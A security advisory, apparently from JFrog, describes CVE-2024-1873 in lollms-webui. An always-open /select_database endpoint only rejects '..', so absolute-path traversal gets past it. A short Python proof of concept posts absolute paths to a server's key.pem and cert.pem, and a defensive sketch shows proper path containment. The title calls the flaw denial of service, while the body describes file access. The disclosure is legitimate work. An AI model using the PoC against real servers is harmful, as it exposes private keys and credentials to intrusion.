JFrog Security Research

JFSA-2024-001028816 - lollms-webui exposed endpoints DoS

CVE-2024-1873 | CVSS 8.2

JFrog Severity: high

Discovered by Naveh Racovsky of the JFrog Security Research Team

Published 16 Apr, 2024 | Last updated 16 Apr, 2024

Exposed endpoints in lollms-webui lead to denial of service

parisneo/lollms-webui

(,)

The /select_database endpoint is always open, even when the program is exposed to the network. This can have several implications. At first glance the endpoint implements basic path traversal protection by looking for ".." in the filename, but this check does not prevent absolute path traversal:

# PoC.py
import requests

IP_ADDRESS = "aaa.bbb.ccc.ddd"
PORT = 9600

for file_name in ["key.pem", "cert.pem"]:
    data = {
        "name": f"/home/user/personal_data/certs/{file_name}",
    }
    response = requests.post(f"http://{IP_ADDRESS}:{str(PORT)}/select_database", json=data)
    print(response.json())
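
The gap described above, as an added example that is not lollms-webui's code: a ".." substring check accepts an absolute path, while resolving the candidate and requiring it to stay under a base directory rejects it. `DB_ROOT`, `weak_check` and `resolve_database_path` are hypothetical names chosen for this sketch.

```python
from pathlib import Path

# Hypothetical base directory for this sketch; the project's real layout is not shown above.
DB_ROOT = Path("/srv/app/databases")


def weak_check(name: str) -> bool:
    """The check as the advisory describes it: reject only names containing '..'."""
    return ".." not in name


def resolve_database_path(name: str, root: Path = DB_ROOT) -> Path:
    """Return the resolved path for `name`, or raise ValueError if it leaves `root`."""
    if not name or "\x00" in name:
        raise ValueError("empty or malformed database name")
    root = root.resolve()
    # Joining with an absolute `name` discards `root` entirely, so the result must
    # be validated after resolution (which also collapses '..' and follows symlinks).
    candidate = (root / name).resolve()
    try:
        relative = candidate.relative_to(root)
    except ValueError:
        raise ValueError(f"{name!r} resolves outside {root}") from None
    if not relative.parts:
        raise ValueError("name must refer to a file inside the database directory")
    return candidate


if __name__ == "__main__":
    # Constructed sample inputs, not taken from a real deployment.
    for sample in ["chat.db", "../secrets.db", "/home/user/personal_data/certs/key.pem"]:
        try:
            verdict = f"accepted -> {resolve_database_path(sample)}"
        except ValueError as exc:
            verdict = f"rejected ({exc})"
        print(f"{sample!r}: weak_check={weak_check(sample)}, hardened: {verdict}")
```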

No mitigations are supplied for this issue.

Advisory
